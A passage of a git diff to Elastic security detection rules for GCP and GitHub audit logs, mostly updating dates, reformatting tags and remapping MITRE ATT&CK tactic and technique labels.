Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,14 +75,36 @@ event.dataset:gcp.audit and event.action:"storage.setIamPermissions" and event.o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml index 49efa174d6f..7763e3925b8 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,14 +64,7 @@ references = ["https://cloud.google.com/vpc/docs/vpc"] risk_score = 47 rule_id = "c58c3081-2e1d-4497-8491-e73a45d1a6d6" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Configuration Audit", - "Tactic: Defense Evasion", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,19 +75,13 @@ event.dataset:gcp.audit and event.action:v*.compute.networks.delete and event.ou [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1485" +name = "Data Destruction" +reference = "https://attack.mitre.org/techniques/T1485/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml index 8ae59e5172f..68be3764092 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,19 +83,18 @@ event.dataset:gcp.audit and event.action:(v*.compute.routes.insert or "beta.comp [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml index 2dbfe20dffd..61e82cd4529 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,19 +83,18 @@ event.dataset:gcp.audit and event.action:v*.compute.routes.delete and event.outc [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml index cff4a666a38..f75f349993b 100644 --- a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml +++ b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,14 +66,7 @@ references = ["https://cloud.google.com/logging/docs/export#how_sinks_work"] risk_score = 21 rule_id = "184dfe52-2999-42d9-b9d1-d1ca54495a61" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Log Auditing", - "Tactic: Exfiltration", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -84,14 +77,18 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Updat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml index d26fdfad9fe..206d58ad008 100644 --- a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml +++ b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,14 +64,7 @@ references = ["https://cloud.google.com/iam/docs/understanding-custom-roles"] risk_score = 47 rule_id = "aa8007f0-d1df-49ef-8520-407857594827" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -82,26 +75,36 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateRole and even [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/ml_gcp_error_message_spike.toml b/rules/integrations/gcp/ml_gcp_error_message_spike.toml index 5a8f5a9bd87..b73fbb0215c 100644 --- a/rules/integrations/gcp/ml_gcp_error_message_spike.toml +++ b/rules/integrations/gcp/ml_gcp_error_message_spike.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -48,25 +48,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "a4b740e4-be17-4048-9aa4-1e6f42b455b1" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: GCP Audit Logs", - "Data Source: Google Cloud Platform", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Discovery", "Tactic: Lateral Movement", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" @@ -77,13 +64,10 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -93,3 +77,10 @@ id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/ml_gcp_rare_error_code.toml b/rules/integrations/gcp/ml_gcp_rare_error_code.toml index 00a36b532e7..9548cd29f37 100644 --- a/rules/integrations/gcp/ml_gcp_rare_error_code.toml +++ b/rules/integrations/gcp/ml_gcp_rare_error_code.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -59,60 +59,3 @@ tags = [ ] type = "machine_learning" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - -[[rule.threat.technique]] -id = "T1526" -name = "Cloud Service Discovery" -reference = "https://attack.mitre.org/techniques/T1526/" - -[[rule.threat.technique]] -id = "T1580" -name = "Cloud Infrastructure Discovery" -reference = "https://attack.mitre.org/techniques/T1580/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml index 6ba99513f42..51d17298fe6 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -49,25 +49,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "f20d1782-e783-4ed0-a0c4-946899a98a7c" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: GCP Audit Logs", - "Data Source: Google Cloud Platform", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,3 +64,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml index c151731755a..d74d7edbfd5 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/23" [rule] anomaly_threshold = 50 @@ -49,25 +49,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "dcbd07f8-bd6e-4bb4-ac5d-cec1927ea88f" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: GCP Audit Logs", - "Data Source: Google Cloud Platform", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,3 +64,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml index 0474776c35d..40c44ea56b8 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/11/21" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -48,25 +48,12 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "2e08f34c-691c-497e-87de-5d794a1b2a53" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: GCP Audit Logs", - "Data Source: Google Cloud Platform", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -77,41 +64,7 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.007" -name = "Cloud Services" -reference = "https://attack.mitre.org/techniques/T1021/007/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml index 6060132006a..2a88a807bf8 100644 --- a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml +++ b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,14 +68,7 @@ references = [ risk_score = 21 rule_id = "9890ee61-d061-403d-9bf6-64934c51f638" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: GCP", - "Data Source: Google Cloud Platform", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -86,14 +79,13 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique]] +id = "T1531" +name = "Account Access Removal" +reference = "https://attack.mitre.org/techniques/T1531/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml index 84d9cc8278b..271bbc2248a 100644 --- a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml +++ b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,14 +87,18 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/gcp/persistence_gcp_service_account_created.toml b/rules/integrations/gcp/persistence_gcp_service_account_created.toml index 64c798841be..0bace523e6a 100644 --- a/rules/integrations/gcp/persistence_gcp_service_account_created.toml +++ b/rules/integrations/gcp/persistence_gcp_service_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,14 +83,18 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" +[[rule.threat.technique.subtechnique]] +id = "T1136.003" +name = "Cloud Account" +reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml b/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml index 505b0df6390..b99c21b1bb6 100644 --- a/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml +++ b/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -72,19 +72,13 @@ configuration where event.dataset == "github.audit" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/github/execution_github_app_deleted.toml b/rules/integrations/github/execution_github_app_deleted.toml index 5bf9ba190ef..0358e321943 100644 --- a/rules/integrations/github/execution_github_app_deleted.toml +++ b/rules/integrations/github/execution_github_app_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,13 +50,7 @@ GitHub Apps are integrations that extend GitHub's functionality, often used to a risk_score = 21 rule_id = "fd01b949-81be-46d5-bcf8-284395d5f56d" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -67,14 +61,13 @@ configuration where event.dataset == "github.audit" and github.category == "inte [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml index 723fabe54ae..91e435a1640 100644 --- a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml +++ b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -52,14 +52,7 @@ Personal Access Tokens (PATs) facilitate automated access to GitHub repositories risk_score = 21 rule_id = "fb0afac5-bbd6-49b0-b4f8-44e5381e1587" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Tactic: Collection", "Tactic: Exfiltration", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "threshold" @@ -72,17 +65,29 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1567" +name = "Exfiltration Over Web Service" +reference = "https://attack.mitre.org/techniques/T1567/" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" [rule.threshold] field = ["github.hashed_token"] value = 1 diff --git a/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml b/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml index 1bd5931c41a..14f7d975ce4 100644 --- a/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml +++ b/rules/integrations/github/execution_github_ueba_multiple_behavior_alerts_from_account.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2023/12/14" maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,14 +70,6 @@ signal.rule.tags:("Use Case: UEBA" and "Data Source: Github") and kibana.alert.w ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.threshold] field = ["user.name"] value = 1 diff --git a/rules/integrations/github/execution_new_github_app_installed.toml b/rules/integrations/github/execution_new_github_app_installed.toml index d7a9a7fb68d..3494dfa9a97 100644 --- a/rules/integrations/github/execution_new_github_app_installed.toml +++ b/rules/integrations/github/execution_new_github_app_installed.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -55,13 +55,7 @@ GitHub Apps enhance functionality by integrating with repositories and organizat risk_score = 47 rule_id = "1ca62f14-4787-4913-b7af-df11745a49da" severity = "medium" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Github", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Github", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -72,14 +66,13 @@ configuration where event.dataset == "github.audit" and event.action == "integra [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1072" -name = "Software Deployment Tools" -reference = "https://attack.mitre.org/techniques/T1072/" +[[rule.threat.technique]] +id = 